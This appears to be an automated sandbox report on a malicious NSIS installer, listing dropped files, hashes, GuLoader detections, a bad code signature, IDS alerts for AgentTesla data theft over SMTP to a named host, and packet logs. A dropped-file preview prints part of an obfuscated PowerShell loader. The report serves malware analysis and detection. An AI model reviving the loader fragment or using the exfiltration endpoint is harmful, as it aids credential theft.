SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfdloxlr.v32.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vek4hjg4.vp2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wehgkpwr.5e0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsr982A.tmp

Download File

Process:	C:\Users\user\Desktop\Nt8BLNLKN7.exe
File Type:	data
Category:	dropped
Size (bytes):	1431505
Entropy (8bit):	4.211872932306435
Encrypted:	false
SSDEEP:	12288:yUoWDeNvo9u+JC8fuhow1WBcvrpiuLR8feXwUEM:yUfOw/JLAjTpiuLR8fegi
MD5:	94E7DF53CAF966AA2B5CF4C36D5E02A5
SHA1:	9D77E88C5D1C2B9DBFE183CDA0BB1E08C80DC754
SHA-256:	702D44BE0DC16D14E89BFE5970D0F935A2121AA7B13A4C8819E02E945BF7C717
SHA-512:	DBF92C207563F965A6A7A00ABECE07BCE0633DB2D7BD38791C3970C6BB1D0FADB0343DD45B084809178FEB25C6B5F58A4975A043ED5EAEE289DD8DEB29B07F96
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\nsr982A.tmp, Author: Joe Security
Preview:	........,...................................................................................................................................................................................................................................................................................J...Z...............j...............................................................................................................................................%...q...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Armmuskler.Fac

Download File

Process:	C:\Users\user\Desktop\Nt8BLNLKN7.exe
File Type:	data
Category:	dropped
Size (bytes):	463719
Entropy (8bit):	7.542515425010881
Encrypted:	false
SSDEEP:	6144:EwoUiXy8JkZeTkw54KNetQ/gmZQpj2naLG7+JC8fu5fZ1oA//pf1GjTw14vcvrTB:2UoWDeNvo9u+JC8fuhow1WBcvrpiuLRR
MD5:	DD01090AF64EEC54547623A92E8E9A51
SHA1:	F1AF6B5B8E8C18B7C06C4A57316C7329A974F0D5
SHA-256:	07DA8C9A4F16041416A9C0E86DAF63E23C193ED19CC060FB565DFC8F0A35A24F
SHA-512:	FFF57B4B2882DE403E17AA1CC083E3C2A056E0C5816EEA6FA25FA26F699BC73FEBD4EA0A892C4996BD5E5D0C584291CBB26BA338875F4C7A3B6992D2CCCDFD86
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Armmuskler.Fac, Author: Joe Security
Preview:	...99..B...............%%%%...............xx......P.........99.......CC..................WW........................b...????.......u...........P........>..................................FF....jjj...........).....l...................\|.....33.....................,.~~...HH...................................................DD..........l..............q....................o..HH........;......++....W.\.......z.....ppp..........P.`..@...........@........ss.....yyy.......\|......\|\|......1...\\\......]]]]]]]]]...............___.....................lll..``.............................00.....pp.'.x..d.................gg........G............J........................i........(((............................zz...............b........................cc....&&......S....K..............w..--.....]]........................................11..}}..........v...............C..................;;.....JJ......)))..}}...FF..l.......................................u..s......gg.^^^.................b.....k..//.<......

C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\Tykkerterne155\puquinan.tod

Download File

Process:	C:\Users\user\Desktop\Nt8BLNLKN7.exe
File Type:	data
Category:	modified
Size (bytes):	397443
Entropy (8bit):	1.2507334034977688
Encrypted:	false
SSDEEP:	768:rutC7/xNChL15JkoO+lJmgozzros+eJn+GYSNODnOaFm3FU4lEQ08aWEwPCWDTLH:DKytNBgY6Q8JMdL4xiMp/7Cgvsww1I8
MD5:	52277EFB876A67F81E5C8478D30F0940
SHA1:	12B0B6D0DED14774C04AE561947C5F99F8046AF8
SHA-256:	3688D48D11BB36B7C25270DE4B4D3C04181121AFCAFFD52A9F9C3FE7B69A2D42
SHA-512:	356CD3B38AEC9B8AE7D831921A2BE60E80983F242D0E9DBBD60AE3CAB4A63DBFD35F12EC055975046070BABD71D847C0A2AD4578D02E845D0753BF7FF56C57E6
Malicious:	false
Preview:	..l........................I.............x...............X...................................9...............................................o....................'..................\........v..............................................................B...................................E.....................................e.......................................M.....v............r..(.........................................................................................,..)..............................#...T.................................M..................................+v...E..............?...............?..............d...................................U.............`.............*..........................................o.....s...........................................................................................................7..y......a........................................................................a.......................................................X.

C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\latrias.reg

Download File

Process:	C:\Users\user\Desktop\Nt8BLNLKN7.exe
File Type:	data
Category:	dropped
Size (bytes):	489222
Entropy (8bit):	1.2506752052648178
Encrypted:	false
SSDEEP:	1536:KRRhfB9L9tO+zdfjXM6/cCVa5RrtfOvY0tl:O/9oQzM+vutfOQY
MD5:	4D738E5B430D2DA5F5440BFBA5E0C83C
SHA1:	3B73C8D8E4291DE2C588D56F6B0911D068B27363
SHA-256:	67733DF8EAC8617D961458E56C3D8D7265F26519D4E50AF7FA62C081363E50CE
SHA-512:	F14D6BC66B42591EDD5CAC6D80583C22F49484EDDE03CBC19616DE5E2F279479FD5D6CD0C8A76BAFB645178BD964A17E91EBCAA050F06818C1000FCE7712C8C0
Malicious:	false
Preview:	.....:...........................................8..........`.............Y...'............................................................................................8..................................................................................................K..........................................................P....................................................................................t.........r.............j...................................................................................................................................................................................m.............................................]......................d~...o.......R..............M................................................................._.......................................m................................................K...................................&.................V.......Q...............o....................................]........./....

C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove

Download File

Process:	C:\Users\user\Desktop\Nt8BLNLKN7.exe
File Type:	ASCII text, with very long lines (4391), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	73060
Entropy (8bit):	5.17923755341938
Encrypted:	false
SSDEEP:	1536:yV3DnfA0a26Yo5ga7po8qo3f1sk1/bNveVhEm6llltZt6msj:mDnYjLY0gqoe32WwVhEm6bXOmsj
MD5:	7376D1EAD1EF69E8A00FAD5B0827C7BF
SHA1:	D5F4B005ADE0607F26C85DA3D19133C3344A2ABB
SHA-256:	9120408EC629BB579E851B43B7558D911F0D6C8F67622C22B2DF7BC25D6616D6
SHA-512:	A0BC31069FFF614B9110C584B502599F033CE5287CBCFD69F469987B798CC09989BB2CF20AB109C68385AE0B22CBD976BF60CAD96E135F05F587ECB5423D966C
Malicious:	false
Preview:	$Hostene=$Jesuitries;..<#Imaginableness nonsensitized Info Hydropathic #>..<#Fderalistiskes Shallowist Liriodendrons Tagnes Deserteringen Orillion #>..<#Headiest Midler turistens Fribads #>..<#Husholdningsregnskabernes brandsituations Underbefolkningerne Prenotation Hadjees Beclasping #>..<#Semisolemnity Skvadroneredes Flders Sjaskeriers Friserings Naturfredningerne #>..<#Meekly Saluters uncompletable Blondiners Wiliwili Housewarm #>...$Tildelingsstningen = @'.Svkk.ls.A athis$VinduesMBreadbouRugegsptKilde.peT ffeesddyna.tyl M,ndaeyKj lesku AnstdsfD.ngledfForurenesproglrrSynliggrCo.losceEmittenrConsola=F cebar$AnkertoPNonillurHeterosoOutrelidDrikkeruNonperikStedbart NonappiindispontilhrskfHurtigeoDyreforrDe.dritmFortrkkavaarfl tOrganisi MelonroHjern,vnKostplaeUnpurlor.isappr;Ubekymr.AabningfOliekiluFor entnForrin.c WhoreitSukkersiUnderkboSugefisn Skindk Di aggrCSilicleoDansebunThe.motvSemispoo Ana aec Putzeda Nedkletrechabio Widowmrplanerp Rapaces(Retrofi$SpermatIBrandurmUdnaevnpscalare

C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\catalog.txt

Download File

Process:	C:\Users\user\Desktop\Nt8BLNLKN7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	401
Entropy (8bit):	4.3081571951748
Encrypted:	false
SSDEEP:	6:Qz1k+ipwZQRjLDgRuJO6LfZ+3eoaaXxZ4lDvxFJoAc4SKpr7l1zR8xWtn:g7SwZAgRuJ7LQ3eolsDvxvoAyCzRyWt
MD5:	3CCD7CE3AEADE62D54268376DE39516D
SHA1:	3A6C81F87F5DFFC16D6F83B80BACB7986F449A92
SHA-256:	923C9A43BB424B083E8C9F4AF6D7542DFD314DE4774CFA4A2C02078A8824F870
SHA-512:	641B40048461820C1B6708662EB89B3C814EB9D81C02407074439253B908F9B706A58F416103093D45181D3A1A79976ED2B317B8B107A16C83346693357B3717
Malicious:	false
Preview:	coverable overboernes rederiernes malta hash sigbrandt penaria..hypocaust vindjakker residensen faglig inspire fossulate.hospitalmen kalvis chunk enantiopathia lkapsler fremkalde yeo brumbasserne..udnvnelsers aandeverdens staidness lsningsmodel rumfartscentres sedimenteres skalaindkomst..wotted intracollegiate baccharoid markswomen fip,skrivelinje laputically luftfarts doublelunged vestal isthmist.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.695675020873005
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Nt8BLNLKN7.exe
File size:	784'016 bytes
MD5:	e31f6ab5e499e9708eaa3c6ef6ac690e
SHA1:	953dcb9d4f23ca1d22a8ceb7690e23db6d837051
SHA256:	286967221848728712fb3c332d30a149368b12e5581e61b84ed6dd55eb415b1b
SHA512:	6e5e93f6ad5af4b78bf32e26d79cd7534c795e49280d67a6acafcce94ff018477d56858958b21b3554cd55ebed6d5dff94dcc95a9fd9bdef44e0d46d67335925
SSDEEP:	12288:HKzcymK25jLk6c2NQpSr6HTqA3wpcJ8YRsecBTvz21+aWcwUtXUSW:HKzwZMSrITqzc+YRIpvq60XUh
TLSH:	E2F4F162F2816CD7C88256B4C5B89730107F8B40A62D461E375DBA2E9EB23056BC7FD7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....n3T.................\...........2.......p....@

File Icon


Icon Hash:	7d4d4dd45f59ec13

Static PE Info

General

Entrypoint:	0x403217
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x54336EB1 [Tue Oct 7 04:40:17 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	59a4a44a250c4cf4f2d9de2b3fe5d95f

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Radilogiskes Simulioid ", E=Oleograph@Malarky.Pet, L=Saint Paul, S=Virginia, C=US
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	16/09/2024 05:04:56 16/09/2027 05:04:56
Subject Chain	CN="Radilogiskes Simulioid ", E=Oleograph@Malarky.Pet, L=Saint Paul, S=Virginia, C=US
Version:	3
Thumbprint MD5:	50F06AC06EAAA5E921FBA25DB7C1302F
Thumbprint SHA-1:	5896E570D453B3876AEEF4ADF65279AC229003FD
Thumbprint SHA-256:	1638ED71443AC9EFEEE5475FB11602E3010FF8B2C0D525A425CC93DA30AA410C
Serial:	68560B112FDF7C12DD73F02CE7784B87F66D2339

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407034h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040728Ch]
push 00000009h
mov dword ptr [004237B8h], eax
call 00007FFA08CCE905h
mov dword ptr [00423704h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECB8h
call dword ptr [00407164h]
push 004091E4h
push 00422F00h
call 00007FFA08CCE5AFh
call dword ptr [004070B0h]
mov ebp, 00429000h
push eax
push ebp
call 00007FFA08CCE59Dh
push ebx
call dword ptr [00407118h]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423700h], eax
mov eax, ebp
jne 00007FFA08CCBB4Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007FFA08CCE02Dh
push eax
call dword ptr [00407220h]
mov dword ptr [esp+1Ch], eax
jmp 00007FFA08CCBC05h
cmp cl, 00000020h
jne 00007FFA08CCBB48h
inc eax
cmp byte ptr [eax], 00000020h
je 00007FFA08CCBB3Ch

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x37000	0x28500	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xbecf0	0x9a0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5bf4	0x5c00	92032f5e50e74fe0fe80a33ba4ca92db	False	0.6700067934782609	data	6.478210757314278	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x11ce	0x1200	5801d712ecba58aa87d1e7d1aa24f3aa	False	0.4522569444444444	OpenPGP Secret Key	5.236122428806677	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a7f8	0x400	f2470ac8847791744aff280e7e2f5353	False	0.615234375	data	5.025395707292401	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0x13000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x37000	0x28500	0x28600	8fe3eeefdb70a69775e0275630c876e7	False	0.33500024187306504	data	5.364335686193679	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x37358	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.27695788477463623
RT_ICON	0x47b80	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.34693609417700233
RT_ICON	0x51028	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.38391866913123845
RT_ICON	0x564b0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.3682687765706188
RT_ICON	0x5a6d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4352697095435685
RT_ICON	0x5cc80	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.4899155722326454
RT_ICON	0x5dd28	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.601639344262295
RT_ICON	0x5e6b0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6870567375886525
RT_DIALOG	0x5eb18	0x140	data	English	United States	0.46875
RT_DIALOG	0x5ec58	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x5ed78	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x5ee40	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x5eea0	0x76	data	English	United States	0.7542372881355932
RT_VERSION	0x5ef18	0x2e0	data	English	United States	0.48777173913043476
RT_MANIFEST	0x5f1f8	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, CloseHandle, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, GetTempPathA, GetWindowsDirectoryA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
USER32.dll	CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-05T15:55:57.771584+0100	2030171	ET MALWARE AgentTesla Exfil Via SMTP	1	192.168.2.7	49923	208.91.199.223	587	TCP
2024-11-05T15:56:21.520828+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.7	49715	TCP
2024-11-05T15:56:49.209942+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49867	142.250.186.78	443	TCP
2024-11-05T15:57:00.229752+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.7	49934	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 5, 2024 15:56:47.630271912 CET	49867	443	192.168.2.7	142.250.186.78
Nov 5, 2024 15:56:47.630294085 CET	443	49867	142.250.186.78	192.168.2.7
Nov 5, 2024 15:56:47.630482912 CET	49867	443	192.168.2.7	142.250.186.78
Nov 5, 2024 15:56:47.639925003 CET	49867	443	192.168.2.7	142.250.186.78
Nov 5, 2024 15:56:47.639939070 CET	443	49867	142.250.186.78	192.168.2.7
Nov 5, 2024 15:56:48.503722906 CET	443	49867	142.250.186.78	192.168.2.7
Nov 5, 2024 15:56:48.503935099 CET	49867	443	192.168.2.7	142.250.186.78
Nov 5, 2024 15:56:48.504472017 CET	443	49867	142.250.186.78	192.168.2.7
Nov 5, 2024 15:56:48.504549026 CET	49867	443	192.168.2.7	142.250.186.78
Nov 5, 2024 15:56:48.842016935 CET	49867	443	192.168.2.7	142.250.186.78
Nov 5, 2024 15:56:48.842032909 CET	443	49867	142.250.186.78	192.168.2.7
Nov 5, 2024 15:56:48.842371941 CET	443	49867	142.250.186.78	192.168.2.7
Nov 5, 2024 15:56:48.842427969 CET	49867	443	192.168.2.7	142.250.186.78
Nov 5, 2024 15:56:48.845896006 CET	49867	443	192.168.2.7	142.250.186.78
Nov 5, 2024 15:56:48.891336918 CET	443	49867	142.250.186.78	192.168.2.7
Nov 5, 2024 15:56:49.209975958 CET	443	49867	142.250.186.78	192.168.2.7
Nov 5, 2024 15:56:49.210071087 CET	49867	443	192.168.2.7	142.250.186.78
Nov 5, 2024 15:56:49.210086107 CET	443	49867	142.250.186.78	192.168.2.7
Nov 5, 2024 15:56:49.210237026 CET	49867	443	192.168.2.7	142.250.186.78
Nov 5, 2024 15:56:49.210251093 CET	49867	443	192.168.2.7	142.250.186.78
Nov 5, 2024 15:56:49.210336924 CET	443	49867	142.250.186.78	192.168.2.7
Nov 5, 2024 15:56:49.210396051 CET	49867	443	192.168.2.7	142.250.186.78
Nov 5, 2024 15:56:49.233995914 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:49.234069109 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:49.234150887 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:49.234375000 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:49.234396935 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:50.110138893 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:50.110224009 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:50.113789082 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:50.113795042 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:50.114033937 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:50.114097118 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:50.114656925 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:50.155334949 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.434506893 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.434621096 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.434684992 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.434750080 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.542895079 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.542980909 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.543032885 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.543045998 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.543065071 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.543122053 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.550175905 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.550236940 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.550242901 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.550287008 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.554605961 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.554666996 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.554672956 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.554711103 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.563626051 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.563678026 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.563683987 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.563764095 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.659876108 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.659926891 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.659945965 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.659981966 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.659992933 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.660043001 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.660046101 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.660095930 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.660099983 CET	443	49876	142.250.186.161	192.168.2.7
